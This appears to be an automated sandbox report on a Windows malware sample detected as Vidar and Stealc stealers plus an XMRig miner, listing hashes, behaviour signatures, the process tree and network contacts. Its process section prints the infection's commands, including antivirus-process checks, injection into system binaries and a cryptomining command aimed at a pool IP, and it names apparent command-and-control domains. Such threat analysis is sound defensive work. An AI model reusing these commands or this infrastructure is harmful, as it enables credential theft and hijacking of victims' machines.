SHA256 8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA512 7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

memory/2908-365-0x0000000000C40000-0x000000000138A000-memory.dmp

memory/2908-366-0x0000000000C40000-0x000000000138A000-memory.dmp

memory/2908-368-0x0000000000C40000-0x000000000138A000-memory.dmp

memory/2908-375-0x0000000000C40000-0x000000000138A000-memory.dmp

memory/2908-377-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2908-376-0x0000000000C40000-0x000000000138A000-memory.dmp

memory/2908-397-0x0000000000C40000-0x000000000138A000-memory.dmp

memory/2908-398-0x0000000000C40000-0x000000000138A000-memory.dmp

memory/2908-414-0x0000000000C40000-0x000000000138A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\ProgramData\BFIDGDAKFHIE\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\BFIDGDAKFHIE\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/2908-421-0x0000000000C40000-0x000000000138A000-memory.dmp

memory/2908-443-0x0000000000C40000-0x000000000138A000-memory.dmp

memory/2908-444-0x0000000000C40000-0x000000000138A000-memory.dmp

C:\ProgramData\HDGHJEBFBF.exe

MD5 3e866192953a6d4125af6df8e1518bf7
SHA1 690fe416af54a52a03eae9528598dc5027b14d68
SHA256 d9479c202794b6fda4bf4bf204b33193bc394e1052e9123907bd8b5a6840e59a
SHA512 7b8d657734d5588f0b36a97418382fe7bd0b358e54c9be7dafaa676aedb97ac78080acdf319036a45f464a0a6ee8cf3cfd1387e0ab7d146a34d2844f52c64706

C:\ProgramData\HDGHJEBFBF.exe

MD5 b7d61a7a54183abb9f8e5d86cc2d91e1
SHA1 71f5bbd5c50d588e3118069d510c423eed09f0b6
SHA256 12337a066d49b8121087e68c62c4c1520261e34489f1caa78cf8fed6091e04f3
SHA512 6e844f437bd5b5f0090f9e722de788b2fcb862d5f73bd7d5f62499b2b8ad473c4dc26b01c8c0d99c304fd84da9ad0743a2435334701c648a48009019c4362d6c

C:\ProgramData\HDGHJEBFBF.exe

MD5 af11db4ffd2e4fdb8e4d2e22272c9973
SHA1 e3a73b845964cc28e62a3811eb5a7b61cc834ed9
SHA256 64a415d103b8062d07d9ad46be28e453c2002911efab2fb299bf8ea1e7340d0b
SHA512 04a1f5ea20d9f3dcfa1b774003de21ead83b4eee2a5c50f81edf6c30cc21a3ca2a5c3b50b0fa2ea53dbcd875d06d654adf6ee6725e30c7887fbeab903d4cbe48

memory/4372-467-0x0000000000AB0000-0x0000000000FC3000-memory.dmp

C:\ProgramData\BGIJJKKJJD.exe

MD5 e590416a2acdd8573a8bf5d8a8cbe65e
SHA1 be72195e8ee943254e55d2773662199d3b6af48d
SHA256 5d2e59f369ab5917498783bd35f2b3e156d3d3274549f33e57e5e3bc7f92c2dd
SHA512 003c30db0acfbd36d231f97e9056d1b77eeda9fee67bb80861b2fd054e1e05f31401bdac14a4836d2bfd3a7abca8ed41277b57c03783fe63bfb3da27d11111d4

C:\ProgramData\BGIJJKKJJD.exe

MD5 ad458bd029ceedbf8b5e264bb4c2d7c6
SHA1 68a9f301b26705f8ba4505910fa034ddf94017a4
SHA256 b4675311556900cd5977796c80f78e93c1378e3d0445c4a21c66e93c647db90f
SHA512 e07317bd8ba31d2c84b5184fa52307b9bfd1e915482c3c369ba811ddc5b1bebc75de7c3297a9fb71c388633079d3dcf4b2cf93973a61ea555a33d6d43c7ccab2

memory/3144-482-0x0000000000290000-0x00000000004D8000-memory.dmp

C:\ProgramData\BGIJJKKJJD.exe

MD5 fee64cf65a1931f17439616f2471903d
SHA1 424ab7afe2a39aaa1206a5f04187efc487d2a6d5
SHA256 1495f57c70b08b48cd601d9aad47338030cdaff9431e83a298de1193b8824ace
SHA512 cc56f3ea60552d044000490cd1c5424c360b37d1d3877a80f113d0ea3e13086b05609f3c0739ade33fb807ddf7435463c71e41ed536386e95c424c2d57471b35

C:\Users\Admin\AppData\Local\Temp\780ba978

MD5 cc035cbce48270bc3ae44aa95100660d
SHA1 fe8ba910bf704be2e790f9e3fe7a37911adf9d76
SHA256 bb1a90c96e5887bbe91ccc7c86fe6fd2b475806bd1b176da5234907044edf5e3
SHA512 4978e6ab7de142ead2459c1fd4e4a3e12ecc409bf175a21b28183f69680d56997c05784e576195523fab8d6f9d803330c3231a52f79f4104742ea8d7b0b5575d

C:\Users\Admin\AppData\Local\Temp\78322298

MD5 30ef87dc76e77c09e56bb9c878d17e79
SHA1 98132da640ddc15d4f59d0ac81c9bf0f7001f10e
SHA256 b3461abfb715d240d31c91b24a0d05640c85d0f49e6e3c011f8b53eff18179ca
SHA512 15cbec93dbb3782decae163fb6125ba53e1fabf8eaad2897695ef15dfae8f8e80edf245c5e57b55ae3398e2ab1aeabe22096debc7897a2ce4407e400d3ebf57c

memory/3144-490-0x0000000072AD0000-0x0000000072C4B000-memory.dmp

memory/4372-489-0x0000000072AD0000-0x0000000072C4B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

memory/4372-497-0x00007FF9F56F0000-0x00007FF9F58E5000-memory.dmp

memory/3144-496-0x00007FF9F56F0000-0x00007FF9F58E5000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-14 12:53

Reported

2024-06-14 12:57

Platform

win11-20240611-en

Max time kernel

123s

Max time network

133s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1152 created 3228 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Windows\Explorer.EXE

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\ProgramData\ECFCBFBGDB.exe N/A
N/A N/A C:\ProgramData\AECAKECAEG.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1152 set thread context of 3736 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 2704 set thread context of 1364 N/A C:\ProgramData\ECFCBFBGDB.exe C:\Windows\SysWOW64\ftp.exe
PID 2636 set thread context of 2024 N/A C:\ProgramData\AECAKECAEG.exe C:\Windows\SysWOW64\ftp.exe
PID 2024 set thread context of 4648 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4648 set thread context of 2320 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\ProgramData\ECFCBFBGDB.exe N/A
N/A N/A C:\ProgramData\AECAKECAEG.exe N/A
N/A N/A C:\ProgramData\ECFCBFBGDB.exe N/A
N/A N/A C:\ProgramData\AECAKECAEG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\ECFCBFBGDB.exe N/A
N/A N/A C:\ProgramData\AECAKECAEG.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3168 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\Setup (6).exe C:\Windows\SysWOW64\cmd.exe
PID 3168 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\Setup (6).exe C:\Windows\SysWOW64\cmd.exe
PID 3168 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\Setup (6).exe C:\Windows\SysWOW64\cmd.exe
PID 3612 wrote to memory of 3592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3612 wrote to memory of 3592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3612 wrote to memory of 3592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3612 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3612 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3612 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3612 wrote to memory of 352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3612 wrote to memory of 352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3612 wrote to memory of 352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3612 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3612 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3612 wrote to memory of 2284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3612 wrote to memory of 3568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3612 wrote to memory of 3568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3612 wrote to memory of 3568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3612 wrote to memory of 3380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3612 wrote to memory of 3380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3612 wrote to memory of 3380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3612 wrote to memory of 764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3612 wrote to memory of 764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3612 wrote to memory of 764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3612 wrote to memory of 1152 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 3612 wrote to memory of 1152 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 3612 wrote to memory of 1152 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 3612 wrote to memory of 1892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3612 wrote to memory of 1892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3612 wrote to memory of 1892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1152 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1152 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1152 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1152 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1152 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 3736 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\ProgramData\ECFCBFBGDB.exe
PID 3736 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\ProgramData\ECFCBFBGDB.exe
PID 3736 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\ProgramData\ECFCBFBGDB.exe
PID 3736 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\ProgramData\AECAKECAEG.exe
PID 3736 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\ProgramData\AECAKECAEG.exe
PID 3736 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\ProgramData\AECAKECAEG.exe
PID 2704 wrote to memory of 1364 N/A C:\ProgramData\ECFCBFBGDB.exe C:\Windows\SysWOW64\ftp.exe
PID 2704 wrote to memory of 1364 N/A C:\ProgramData\ECFCBFBGDB.exe C:\Windows\SysWOW64\ftp.exe
PID 2704 wrote to memory of 1364 N/A C:\ProgramData\ECFCBFBGDB.exe C:\Windows\SysWOW64\ftp.exe
PID 2636 wrote to memory of 2024 N/A C:\ProgramData\AECAKECAEG.exe C:\Windows\SysWOW64\ftp.exe
PID 2636 wrote to memory of 2024 N/A C:\ProgramData\AECAKECAEG.exe C:\Windows\SysWOW64\ftp.exe
PID 2636 wrote to memory of 2024 N/A C:\ProgramData\AECAKECAEG.exe C:\Windows\SysWOW64\ftp.exe
PID 3736 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Windows\SysWOW64\cmd.exe
PID 3736 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Windows\SysWOW64\cmd.exe
PID 3736 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Windows\SysWOW64\cmd.exe
PID 2548 wrote to memory of 3428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2548 wrote to memory of 3428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2548 wrote to memory of 3428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2704 wrote to memory of 1364 N/A C:\ProgramData\ECFCBFBGDB.exe C:\Windows\SysWOW64\ftp.exe
PID 2636 wrote to memory of 2024 N/A C:\ProgramData\AECAKECAEG.exe C:\Windows\SysWOW64\ftp.exe
PID 1364 wrote to memory of 2864 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 1364 wrote to memory of 2864 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 1364 wrote to memory of 2864 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 2024 wrote to memory of 4648 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2024 wrote to memory of 4648 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 1364 wrote to memory of 2864 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 2024 wrote to memory of 4648 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2024 wrote to memory of 4648 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4648 wrote to memory of 2320 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Setup (6).exe

"C:\Users\Admin\AppData\Local\Temp\Setup (6).exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Northeast Northeast.cmd & Northeast.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 328159

C:\Windows\SysWOW64\findstr.exe

findstr /V "EnclosedVisibilityDuringBrilliant" Peter

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Urge 328159\g

C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

328159\Prototype.pif 328159\g

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

C:\ProgramData\ECFCBFBGDB.exe

"C:\ProgramData\ECFCBFBGDB.exe"

C:\ProgramData\AECAKECAEG.exe

"C:\ProgramData\AECAKECAEG.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FHJKKECFIECA" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1"

Network

Country Destination Domain Proto
SE 192.229.221.95:80 tcp
US 104.21.81.243:443 theemir.xyz tcp
GB 172.217.169.67:80 c.pki.goog tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 20.189.173.15:443 tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.16.123:443 businessdownloads.ltd tcp
GB 172.217.169.67:80 c.pki.goog tcp
US 104.21.81.243:443 theemir.xyz tcp
US 199.232.196.193:443 i.imgur.com tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
FI 135.181.22.88:80 135.181.22.88 tcp
FI 65.109.127.181:3333 tcp
US 45.152.112.146:80 proresupdate.com tcp
FI 65.109.127.181:3333 tcp
US 104.21.76.173:443 contur2fa.recipeupdates.rest tcp
GB 172.217.169.67:80 c.pki.goog tcp
US 104.21.76.173:443 contur2fa.recipeupdates.rest tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Northeast

MD5 b45202591b60b052447886eb104577f0
SHA1 afa16d62ffd59c86e63e8dd3060baf34a57e7cf1
SHA256 997fc2668f5943d35d2b435e4270a2576b2ef275710f885066a25cc9cd1213e0
SHA512 9d0496c339dfa022115959cbe86ede08ee7f8f97bae31aa5b2e4af63768e4032b526745197bcce5104c2de983f58a9932827481b76c09addade6074c89f14775

C:\Users\Admin\AppData\Local\Temp\Peter

MD5 8bf9404a2322b0a2bcd19382cf90ebc2
SHA1 ac84d7e0ef6aedeb925b53dbd10a085be6760cec
SHA256 1d04056759eef1c0e886bde0d53277f2e248e1f3158f08158151ed27a74efcdc
SHA512 6df401889e198484dfbf03e94eb408fea6dcb3cf9470457f42c16795d4660f906ecbcbcde2ec0c44f3261a839b9137e6050035d656236f5f9164b3239ba881a8

C:\Users\Admin\AppData\Local\Temp\Showers

MD5 de37f7dfee32a6745cad440181cc795e
SHA1 69bd1675df2b06946e0d5da452b5c0d808e76ebd
SHA256 1692192f6fbe9a0757027029c9773196ec6bfb53781336a9164e66510b9de5cc
SHA512 a6a44be54cc0c00904a058808237700a223d78254e6ef1c844f6beb66ec5d17955a47757f8cb039571c7b1da213f5c39e5be54112bb6a772bdcce4e1403376ae

C:\Users\Admin\AppData\Local\Temp\Donor

MD5 165c9fef67a01106cb4a15a8f73ff06e
SHA1 94b530edfc27c9010871d96c4eccd1c3e0708c9f
SHA256 a69c145a5b5b20eb93b7d82e9440d7a0beba53072b83ecc4cddb9e2137a9fe96
SHA512 0648396ae2e4cc86db49b2e3980affa69ddf4b0b607ac5aa80c0611b3df5dac415653a94486cb2eb05d00a1eed680b547d58f489d62f6a2d19f0d910e2a82f42

C:\Users\Admin\AppData\Local\Temp\Eleven

MD5 b8e5f0ae5af9b75bf009885a32a042cc
SHA1 88c1820f1ba8065871ffdc250a8a0463887dddb8
SHA256 2e83d333c7566963ce675a32b42a6c4b99a907ca2c34c1a8213730e4ad461a24
